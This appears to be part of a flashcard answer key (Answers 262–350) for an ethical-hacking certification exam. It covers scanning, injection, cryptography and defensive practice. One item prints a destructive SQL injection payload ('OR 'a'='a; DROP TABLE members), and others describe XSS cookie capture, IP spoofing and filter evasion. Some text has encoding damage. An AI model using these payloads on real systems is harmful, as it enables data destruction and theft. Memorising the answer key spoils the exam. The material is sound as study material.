Creating a sophisticated XSS payload that leverages HTML encoding to bypass the input sanitization can be used to redirect users to a malicious site where their cookies can be captured, which circumvents the HTTPOnly flag by redirecting users rather than directly accessing the cookies.

Answer 262

A

Default settings reveal server software type; change these settings, as attackers can exploit known vulnerabilities of specific software types more easily when the default settings that reveal this information are used.

Answer 263

A

Conduct regular cybersecurity awareness training, focusing on phishing attacks, as it empowers employees to recognize and avoid such threats while maintaining the autonomy granted by a Bring Your Own Device (BYOD) policy.

Answer 264

A

Unauthorized users may perform privilege escalation using unnecessarily created accounts, as misconfigurations granting administrative permissions to unknown users can lead to unauthorized access and control over the system.

Answer 265

A

A Pulse Wave attack sends high-volume traffic pulses at regular intervals and effectively exhausts network resources and is resistant to simple defensive measures like IP-based blocking.

Answer 266

A

Using client-side encryption and manage encryption keys independently of the CSP ensures that the cloud service provider does not have access to the keys necessary to decrypt the data, thereby securing the data against unauthorized access by the CSP.

Answer 267

A

Writing YARA rules specifically to identify goodware files triggering false positives would help an IDS differentiate between actual threats and legitimate files, reducing false positives without compromising threat detection.

Answer 268

A

System crashes and instability due to traffic with packet sizes exceeding the prescribed limit is indicative of a Ping of Death attack, which involves sending malformed or oversized packets to crash the target system.

Answer 269

A

Implementing network segmentation to separate IloT devices from the rest of the network reduces the risk of a compromised device affecting the entire network and enhances the overall security of the operational technology environment.

Answer 270

A

Conducting a vulnerability assessment specifically for loT devices will help identify potential security weaknesses in the loT integration, providing a basis for implementing appropriate protective measures.

Answer 271

A

In Windows Vista or a later version, LM hashes are disabled by default, as these systems no longer store LM hashes to enhance security, result in blank entries for LM hashes in the SAM file.

Answer 272

A

A Zero Trust model operates on the principle of least privilege, verifying each request as if it is from an untrusted source, regardless of its location, thereby providing stringent access control to the cloud resources and enhancing security.

Answer 273

A

Attacks exploiting a hardware vulnerability to induce misprediction of instructions and using observable side effects to infer data values describe a Side-Channel Attack, specifically targeting the speculative execution in processors.

Answer 274

A

Performing regular server configuration audits helps to identify and rectify potential misconfigurations, thereby protecting the web server from attacks that exploit such vulnerabilities.

Answer 275

A

A mobile app security feature should prevent the app from communicating over a network if it detects a rogue access point, thereby protecting against man-in-the-middle attacks conducted through rogue Wi-Fi hotspots by halting potentially compromised communications.

Answer 276

A

ARP Ping Scan works within the LAN to discover live hosts, bypassing firewalls that might block other types of pings, like ICMP or TCP.

Answer 277

A

yarGen generates YARA rules from strings identified in malware files while removing strings that also appear in goodware files, effectively complementing Snort rules in the IDS by enhancing malware detection while minimizing false positives.

Answer 278

A

Analyzing initial exploitation methods used by an adversary is most crucial for initial analysis, as understanding how they gained entry will help identify vulnerabilities and prevent similar attacks in the future.

Answer 279

A

Script Kiddies trying to compromise the system using pre-made scripts creates a pattern of automated requests from various locations indicating a lack of advanced skills typically associated with unskilled hackers using readily available tools.

Answer 280

A

Implementing a brute force attack to verify system vulnerability would not assist in detecting a honeypot, as this method does not specifically identify honeypots but rather attempts to exploit potential vulnerabilities.

Answer 281

A

Implement 802.1X authentication, as it provides a robust framework for network access control, ensuring that each user is individually authenticated, thereby reducing the risk of unauthorized access due to shared login credentials.

Answer 282

A

Encrypting data client-side before uploading to the cloud and retaining control of the encryption keys ensures that the client maintains complete control over the encryption process and the keys, complying with their regulatory requirements.

Answer 283

A

Shoulder surfing is not likely to yield beneficial information based on collected Internet infrastructure details (domains, DNS names, Netblocks, IP address information), as it requires physical proximity and does not directly relate to the digital data gathered.

Answer 284

A

Enabling WPA2 or WPA3 encryption on the wireless router provides strong security by encrypting data transmitted over the network, ensuring the network is secure from potential attacks.

Answer 285

A

Unnecessary services could contain vulnerabilities - Always minimize the attack surface, as reducing the number of running services decreases potential entry points for attackers, enhancing the overall security of the web server.

Answer 286

A

Regularly updating and patching the server software is crucial for security, ensuring that vulnerabilities are addressed promptly and the server is secure from common threats.

Answer 287

A

Implementing network scanning and monitoring tools can help detect and analyze unauthorized sniffing activities on the network, thereby enhancing the ability to respond to and mitigate these security threats.

Answer 288

A

Implementing the Diffie-Hellman protocol for secure key exchange allows two parties to securely exchange cryptographic keys over an unsecured communication channel, making it suitable for managing and distributing symmetric keys.

Answer 289

A

Utilizing a blind injection technique that uses time delays or error signatures to extract information can infer database details when explicit error messages are not available, by observing the behavior of the application to different inputs.

Answer 290

A

Hping3 uses the ‘-a’ option to spoof the source IP address, enabling the attacker to conduct the scan while maintaining anonymity.

Answer 291

A

Using Hping3 for an ICMP ping scan, Nmap for a SYN, and Metasploit to exploit identified vulnerabilities, provides a comprehensive approach from discovering live hosts to exploiting vulnerabilities.

Answer 292

A

Detailed error messages like “Incorrect Syntax near…. “, and “Unclosed quotation mark after the character string….” are examples of Error-based SQL Injection

Answer 293

A

Conduct for employees on various social engineering methodologies anh risks associated with comprehensive training sessions revealing confidential data, would be successful in preventing an employee from unintentionally divulging information during a phone call.

Answer 294

A

To confirm a Cross-Site Scripting vulnerability is present, you may utilize a script hosted on the application’s domain to test forms‚Äô ability to bypass a Content Security Policy (CSP).

Answer 295

A

m=90, b=15: The server can manage 90 connections per second, but the attacker’s 100 connections exceed this, and with each connection held up for 15 seconds, the attack duration could be significant.

Answer 296

A

Leverage string concatenation to break identifiable keywords, as this technique alters the structure of SQL statements in a way that can evade signature-based detection systems while still executing the intended malicious query.

Answer 297

A

Investigate for anomalies in file movements or unauthorized data access attempts within your database system, as APTs often involve stealthy data breaches and unusual internal activities, making such investigations critical for confirming and isolating these threats.

Answer 298

A

Deploying a Cloud Access Security Broker (CASB) provides comprehensive monitoring of cloud resources, real-time threat detection, and ensures consistent enforcement of security policies across all cloud workloads.

Answer 299

A

eMailTrackerPro is designed to track the source and travel path of an email, including time spent reading the email, geolocation, and device type, but not to identify or list all email accounts associated with a domain.

Answer 300

A

Store the potentially malicious program on an external medium, such as a CD-ROM, before analysis on the sheep dip computer, to avoid direct transfer to the isolated system and to maintain the security of the production environment.

Answer 301

A

An organization is at fault if it does not fix all identified vulnerabilities, reflecting a gap in their approach to cybersecurity by prioritizing limited resources over addressing all known risks.

Answer 302

A

If the Wi-Fi password is too complex and long it is difficult to crack as complex and lengthy passwords significantly increase the time and computational power required for successful brute-force attacks.

Answer 303

A

Encrypting the data client-side before uploading to the SaaS environment and managing encryption keys independently ensures the data remains private and inaccessible to the cloud service provider or any unauthorized entities.

Answer 304

A

Sending a FIN or RST packet to close the connection after it is successfully opened is essential to properly terminate the established connection to maintain ethical hacking practices and avoid unnecessary resource utilization on the target host.

Answer 305

A

WPA2-PSK with AES encryption provides a significantly more secure and modern encryption method compared to WEP, greatly enhancing the security of the company’s wireless network.

Answer 306

A

z=600, u=2: The attacker devises 2 SQL payloads, each aimed at tables holding 600 records, affecting all columns across all tables, resulting in the highest data volume extracted as per the formula ‘E=xyz*u’.

Answer 307

A

dnsrecon -t std performs a standard enumeration (std) of the specified IP range, which includes reverse DNS lookups, nameserver, and MX record queries, providing comprehensive information about the domain.

Answer 308

A

Use UDP Traceroute in the Linux operating system as it allows tracing the packet’s path without relying on ICMP, which may be blocked by the target’s firewall.

Answer 309

A

A TCP SYN Ping Scan can bypass strict TCP filtering rules by sending SYN packets and analyzing responses, which helps in discovering live hosts even with robust firewall settings.

Answer 310

A

Verify the sender’s identity before opening any files in Instant Messenger Applications can prevent a malicious file from being opened and executed.

Answer 311

A

Implementing IPsec in addition to SSL/TLS provides data integrity checks and ensures the data has not been tampered with during transmission.

Answer 312

A

An inference-based assessment solution simulates an attacker’s perspective, uses automated scans with updated databases, and is adaptable for multiple networks, aligning well with large organization’s requirements.

Answer 313

A

User-directed spidering with tools like Burp Suite and WebScarab allow manual control over web crawling, enabling the ethical hacker to uncover and explore website elements that standard automated web spiders cannot access due to specific restrictions.

Answer 314

A

Establishing a Defense-in-Depth strategy incorporating multiple layers of security measures increases the complexity and decreases the likelihood of a successful attack and provides a comprehensive and layered defense against various types of vulnerabilities and threats.

Answer 315

A

Regularly scanning systems for any new files and examining them helps in early detection and removal of suspicious files and attachments, effectively reducing the risk of malware installation from email sources.

Answer 316

A

Always suppress detailed error messages, as they can expose sensitive information about the server’s internal workings, making it vulnerable to exploitation by attackers.

Answer 317

A

Maimon Scan is very similar to NULL, FIN, and Xmas scans, but uses FIN/ACK, making it less likely to be detected by network security devices that are set to identify and flag more common scan types like SYN scans.

Answer 318

A

Test 1: A TCP packet with the SYN and ECN-Echo flags enabled is sent to an open TCP port.

Answer 319

A

h=1987 (prime): The attacker’s packet rate exceeds the server’s Capacity, causing potential unresponsiveness, as the server’s ability to handle packets (h) is lower than the rate at which the attacker sends packets (r), leading to a risk of server failure.

Answer 320

A

Using the IDLE/IPID header scan technique with the command “-sI” allows the attacker to perform a stealthy scan without revealing its IP address.

Answer 321

A

p=175, q=250: The key size ‘n’ is adjusted by increasing both ‚Äòp’ and ‘q’, thereby increasing the complexity of the attacker’s decryption process, as a larger ‘n’ means a higher computational effort required for decryption using Shor’s algorithm on a quantum computer.

Answer 322

A

The ports on the target network are open if there is an increase in the IPID number by 2 after an IDLE scan.

Answer 323

A

The next logical step in the Cyber Kill Chain Methodology following the “Delivery” stage, where the attacker uses the delivered payload to compromise the system would be to exploit the malicious payload delivered to the target organization and establish a foothold.

Answer 324

A

Connecting the system to the production network he malware analysis should be avoided, as it risks spreading the malware and potentially compromises the security of the production environment.

Answer 325

A

‚ÄòOR ‘a’=’a; DROP TABLE members; –: This payload combines the manipulation of the WHERE clause with a destructive action, causing data loss, which is significantly impactful as it can lead to permanent deletion of critical data from the database.

Answer 326

A

snmp-check gathers a wide array of information about the target, as this tool is specifically designed for SNMP enumeration and can extract detailed network information without modifying any parameters in the SNMP agent’s MIB.

Answer 327

A

Passive Footprinting first, followed by Active Footprinting, minimizes chances of detection during initial information gathering, providing an initial layer of information before engaging in more intrusive techniques that could alert the target.

Answer 328

A

Metamorphic and Rootkit malware embeds itself within system files to avoid detection (a characteristic of rootkits) and changes its code to evade signature-based detection, which is a feature of metamorphic malware.

Answer 329

A

Qualys Vulnerability Management, as it offers comprehensive coverage and visibility across both on-premise and cloud environments, continous scanning capabilities, and real-time monitoring for changes, making it ideal for hybrid IT infrastructures.

Answer 330

A

Ensuring atomicity of operations between checking and using data resources, as this approach directly addresses TOC/TOU errors by making sure that the state of a resource does not change between the moment it is checked and the moment it is used, preventing race conditions.

Answer 331

A

RST hijacking is a technique of injecting a spoofed reset packet to terminate a legitimate connection aligns with the methodology of RST hijacking, where the attacker sends a reset command to one or both parties in an active connection.

Answer 332

A

By deploying network intrusion detection systems (IDS) across an loT network, an IDS can monitor the network for suspicious activity, including the early signs of a DDoS attack, and take preventative actions to mitigate the attack before it impacts critical services.

Answer 333

A

Probing the IPC share by attempting to brute force admin credentials directly targets the IPC share to enumerate possible points of access or vulnerabilities, which is essential for gathering detailed information about network shares and services.

Answer 334

A

Insider attacks involve a high degree of understanding of the organization’s internal processes and systems, they can be prevented by implementing robust access control and monitoring.

Answer 335

A

Synthetic Identity Theft involves creating a new identity using a combination of real and fabricated information, which the attacker then uses to open bank accounts and receive benefits, making it distinct from other types of identity theft.

Answer 336

A

A SYN scan stealthily identifies open ports without fully establishing a connection, as sending an RST packet after receiving a SYN/ACK prevents the completion of the three-way handshake, making the scan less detectable.

Answer 337

A

location: This operator finds information for a specific location, making it the least useful for extracting sensitive VPN-related information, as VPN configurations and details are unlikely to be tied to specific geographic locations in searchable content.

Answer 338

A

Encrypting all sensitive data stored on a device ensure that even if the device is compromise, sensitive information such as credit card details and personal identification numbers (PINs) remains protected and inaccessible to unauthorized users.

Answer 339

A

Base metric represents the inherent qualities of a vulnerability, as it measures the fundamental characteristics that are constant over time and across user environments, providing a foundation for the overall CVSS score.

Answer 340

A

nbtstat is traditionally used with |IPv4, if the company’s network is using IPv6, an enumeration tool compatible with IPv6 is required for effective NetBIOS enumeration.

Answer 341

A

Checking for hardware and software misconfigurations to identify any possible loopholes is very important, even with up-to-date systems and trained employees, as misconfigurations can remain a significant source of vulnerabilities in a secure setup.

Answer 342

A

Thin Whois model only provides limited information about the domain, such as the registrar and name servers, requiring further queries to other servers for complete details, which may appear as incomplete data retrieval.

Answer 343

A

A hacker may attempt to bypass the special character filter by encoding his malicious input, which could potentially enable him to successfully inject damaging SQL queries, as encoding can help evade filters that are designed to block known attack patterns and special characters.

Answer 344

A

An AES key size of 256 bits provides a high level of security, which is crucial against a quantum algorithm threat, while maintaining a reasonable balance with performance, as RSA key generation time is primarily influenced by the RSA key size rather than the AES key size.

Answer 345

A

Enforcing a policy that only allows app installations from approved corporate app stores directly addresses the risk of malicious app installations by ensuring that only vetted and secure apps can be installed on company-provided devices.

Answer 346

A

When executing ntptrace -n -m 5 [servername/IP_address], the ‘-n’ option avoids DNS resolution for faster results, and ‘-m 5’ limits the maximum number of NTP servers in the trace, making it efficient to understand the NTP hierarchy and server connections.

Answer 347

A

In pretexting, fraudsters may impersonate executives from financial institutions, telephone companies, and other businesses, potentially leading to a network vulnerability of gaining access to proprietary project details

Answer 348

A

Exploit the NetBIOS Session Service on TCP port 139 to gain unauthorized access to the file system, which can be exploited to gain information about an enterprise’s internal network.

Answer 349

A

After discovering a keylogger, the team should employ intrusion detection systems and regularly update the system software, as these measures can help detect unauthorized programs and vulnerabilities that keyloggers exploit to gain access.

Answer 350

A

Applying the Diffie-Hellman protocol to exchange the symmetric key allows two parties to securely exchange a symmetric key over an insecure channel, which can then be used to encrypt and decrypt sensitive data.

Brainscape's Knowledge GenomeTM

Fast Track Flashcards

Brainscape's Knowledge Genome^TM